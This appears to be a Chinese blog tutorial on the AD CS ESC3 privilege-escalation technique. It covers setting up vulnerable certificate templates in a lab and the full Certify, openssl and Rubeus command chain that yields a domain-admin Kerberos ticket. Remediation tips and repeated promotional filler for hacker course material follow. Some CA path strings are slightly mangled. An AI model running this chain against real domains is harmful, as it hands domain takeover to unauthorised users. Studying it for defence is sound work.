惊天漏洞!ADCS-ESC3 证书提权,菜鸟也能变身域管理员?从零基础到精通,收藏这篇就够了!

一、漏洞原理:听说证书也能“搞事情”? 🔑

ADCS 的 ESC3 漏洞,说白了就是利用 ADCS 证书模板配置上的小疏忽,搞一波权限提升的大动作。简单来说,就是通过证书请求代理 EKU 来“瞒天过海”,最终实现权限提升。这个过程就像是玩了一场“狸猫换太子”的游戏,只不过我们换的是权限!

攻击分为两步走:

  1. 第一步: 低权限用户先用“障眼法”,申请一个包含证书请求代理 EKU 的证书。这就像是拿到了一个“通行证”。
  2. 第二步: 拿着这个“通行证”,冒充高权限用户去申请另一个证书,最终的目标是——拿下域管理员权限!

二、漏洞利用条件:想要“搞事情”,先看你有没有“入场券” 🛠️

想要成功利用 ESC3 漏洞,需要满足一些前提条件,也就是拿到“入场券”:

模板一配置要求:

  • 证书注册权限: 必须是“Authenticated Users”(经过身份验证的用户)。也就是说,只要是域内的合法用户,都有资格来“掺和”一下。
  • 应用策略: 必须包含“证书申请代理”。这是关键,有了它,才能冒充别人去申请证书。
  • 使用者名称: 必须是“用户主体名称”。

模板二配置要求:

  • 证书注册权限: 同样是“Authenticated Users”。
  • 应用策略: 必须包含“客户端身份验证”和“智能卡登录”。
  • 使用者名称: 必须是“用户主体名称”。

三、漏洞环境构造:手把手教你搭建“舞台” 🔧

想要“唱戏”,总得有个“舞台”吧?下面就来手把手教你搭建 ESC3 漏洞的“舞台”:

配置证书模板一

安全

将 "Authenticated Users" 加入注册权限,让大家都有“参与感”。

image.png

image.png

使用者名称

选择用 AD 中的信息生成,并且勾选“用户主体名称”。

扩展

选择应用程序策略,将策略设置为“证书申请代理”。

image.png

配置证书模板二

在 ADCS 服务器中运行 certtmpl.msc 打开证书模板控制台,右键复制“工作站身份验证”。

常规

把模板名称改成“ESC32”,方便我们识别。

安全

同样,将 "Authenticated Users" 加入注册权限。

image.png

使用者名称

选择用 AD 中的信息生成,勾选“用户主体名称”。

扩展

选择应用程序策略,确保包含“客户端身份验证”和“智能卡登录”。

image.png

发布要求

发布证书模板

打开 certsrv.msc,在证书颁发机构中的证书模板上右键点击,选择“新建” -> “要颁发的证书模板”,选择我们新复制的模板“ESC32”并确定添加。

四、漏洞环境检测:看看你的“舞台”搭好了没? 🔍

“舞台”搭好了,总得测试一下,看看是不是真的能用吧?

使用 Certify 工具来检测是否存在证书配置错误:

Certify.exe find /vulnerable

如果出现以下情况,就说明你的“舞台”搭建成功了,可以开始“表演”了:

  1. mspki-certificate-application-policy: 证书申请代理
  2. Enrollment Rights: Authenticated Users 可获取证书

满足以上条件,就可以利用证书漏洞,伪装成域管理员,获取更高的权限啦!

五、漏洞利用:开始你的“表演”! 🔮

现在,让我们开始真正的“表演”!

在普通域用户下,使用 Certify.exe 以 administrator 身份申请 ESC3 证书:

Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC3 /altname:administrator

image.png

将申请的证书复制保存为 esc3.pem,然后使用 openssl 转换成 esc3.pfx,密码可以留空:

openssl pkcs12 -in esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3.pfx

通过 esc3.pfx 获取 ESC32 证书:

Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC32  /onbehalfof:lutraadministrator /enrollcert:esc3.pfx

将申请的证书复制保存为 esc32.pem,再次使用 openssl 转换成 esc32.pfx,密码同样留空:

openssl pkcs12 -in esc32.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc32.pfx

最后,使用 Rubeus 请求域管 administrator 的 TGT:

Rubeus.exe asktgt /user:administrator /certificate:esc32.pfx /dc:192.168.110.127 /ptt

如果一切顺利,你就可以成功导入域管 TGT 票据,摇身一变,成为拥有至高无上权力的域管理员!

导入票据后,你就已经拥有了访问域控目录的权限,可以为所欲为啦!

六、总结:安全无小事,防患于未然! ⚠️

ESC3 漏洞利用了证书颁发过程中的配置错误,通过两个特定模板的配置不当,最终实现了权限提升。这再次提醒我们,安全无小事,一个小小的配置疏忽,就可能导致整个系统的沦陷!

修复建议:

  • 严格控制证书模板的注册权限, 不要让“闲杂人等”也能随意注册证书。
  • 禁止不必要的证书申请代理策略, 避免被恶意用户利用。
  • 确保 CA 服务器的配置安全, 定期检查配置,及时发现并修复潜在的安全隐患。
  • 及时修补 ADCS 服务相关漏洞, 不要让漏洞成为黑客的“后花园”。

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值